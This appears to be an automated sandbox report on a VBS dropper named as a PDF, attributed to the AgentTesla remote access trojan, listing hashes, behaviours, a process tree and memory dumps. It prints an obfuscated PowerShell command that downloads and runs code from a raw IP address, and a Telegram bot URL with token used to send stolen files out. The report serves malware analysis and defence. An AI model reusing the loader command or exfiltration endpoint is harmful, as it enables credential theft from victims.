Analysis
max time kernel: 136s
max time network: 125s
platform: windows10_x64
resource: win10-en-20211014
submitted: 21-10-2021 18:19
Static task: static1
Behavioral task: behavioral1
  Sample: 183287857-050118-sanlccjavap0004-6561_PDF.vbs
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: 183287857-050118-sanlccjavap0004-6561_PDF.vbs
  Resource: win10-en-20211014
General
Target: 183287857-050118-sanlccjavap0004-6561_PDF.vbs
Size: 440B
MD5: fd5d9dd54f30ebeda49b3f3d9d57d1c6
SHA1: bdc86ae73f8ea542af15ed6a5643b1a9cfd8ea51
SHA256: 75e81b26f76f0050408e59a9d3606e0ee6d474ffa9e2296187f582884fa2f59f
SHA512: 60857407aa6143be42149dac675348dcbfaa1a9ed8dd66e66fe936dbabca8dd490d3019573fe940631741047e7edb0b0df9730a33ccaf48aed077e939608b7b9
Malware Config
Extracted:
  http://202.55.132.106/Bypass3.txt
Extracted:
  Family: agenttesla
  https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

AgentTesla Payload (3 IoCs)
resource | yara_rule
behavioral2/memory/3200-150-0x000000000043774E-mapping.dmp | family_agenttesla
behavioral2/memory/3200-153-0x0000000000730000-0x000000000076C000-memory.dmp | family_agenttesla
behavioral2/memory/3200-157-0x0000000004B60000-0x000000000505E000-memory.dmp | family_agenttesla

Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe
flow | pid | process
8 | 724 | powershell.exe
21 | 724 | powershell.exe

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes: aspnet_compiler.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe

Suspicious use of SetThreadContext (1 IoC)
Processes: powershell.exe
description | pid | process | target process
PID 724 set thread context of 3200 | 724 | powershell.exe | aspnet_compiler.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, aspnet_compiler.exe
pid | process
724 | powershell.exe
724 | powershell.exe
724 | powershell.exe
3200 | aspnet_compiler.exe
3200 | aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: powershell.exe, aspnet_compiler.exe
description | pid | process
Token: SeDebugPrivilege | 724 | powershell.exe
Token: SeDebugPrivilege | 3200 | aspnet_compiler.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes: aspnet_compiler.exe
pid | process
3200 | aspnet_compiler.exe

Suspicious use of WriteProcessMemory (10 IoCs)
Processes: WScript.exe, powershell.exe
description | pid | process | target process
PID 2500 wrote to memory of 724 | 2500 | WScript.exe | powershell.exe
PID 2500 wrote to memory of 724 | 2500 | WScript.exe | powershell.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe
PID 724 wrote to memory of 3200 | 724 | powershell.exe | aspnet_compiler.exe

outlook_office_path (1 IoC)
Processes: aspnet_compiler.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe

outlook_win_path (1 IoC)
Processes: aspnet_compiler.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Processes (process tree; depth 1 to 3, PIDs as recorded in the signatures above)

1. C:\Windows\System32\WScript.exe (PID 2500)
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\183287857-050118-sanlccjavap0004-6561_PDF.vbs"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 724, child of 1)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://202.55.132.106/Bypass3.txt')
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 3200, child of 2)
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
         - Accesses Microsoft Outlook profiles
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx
         - outlook_office_path
         - outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory dump | filesize
memory/724-129-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-151-0x0000029AF80A0000-0x0000029AF80A1000-memory.dmp | 4KB
memory/724-117-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-118-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-119-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-120-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-122-0x0000029AF8670000-0x0000029AF8672000-memory.dmp | 8KB
memory/724-121-0x0000029AF8000000-0x0000029AF8001000-memory.dmp | 4KB
memory/724-123-0x0000029AF8673000-0x0000029AF8675000-memory.dmp | 8KB
memory/724-124-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-125-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-126-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-127-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-128-0x0000029AFA750000-0x0000029AFA751000-memory.dmp | 4KB
memory/724-152-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-133-0x0000029AF8676000-0x0000029AF8678000-memory.dmp | 8KB
memory/724-144-0x0000029AF8070000-0x0000029AF8094000-memory.dmp | 144KB
memory/724-116-0x0000029AF6690000-0x0000029AF6692000-memory.dmp | 8KB
memory/724-115-0x0000000000000000-mapping.dmp | -
memory/3200-150-0x000000000043774E-mapping.dmp | -
memory/3200-153-0x0000000000730000-0x000000000076C000-memory.dmp | 240KB
memory/3200-155-0x0000000005060000-0x0000000005061000-memory.dmp | 4KB
memory/3200-156-0x0000000004D20000-0x0000000004D21000-memory.dmp | 4KB
memory/3200-157-0x0000000004B60000-0x000000000505E000-memory.dmp | 5.0MB
memory/3200-158-0x0000000005000000-0x0000000005001000-memory.dmp | 4KB
memory/3200-159-0x00000000058C0000-0x00000000058C1000-memory.dmp | 4KB
memory/3200-160-0x0000000005F90000-0x0000000005F91000-memory.dmp | 4KB
memory/3200-161-0x0000000005A40000-0x0000000005A41000-memory.dmp | 4KB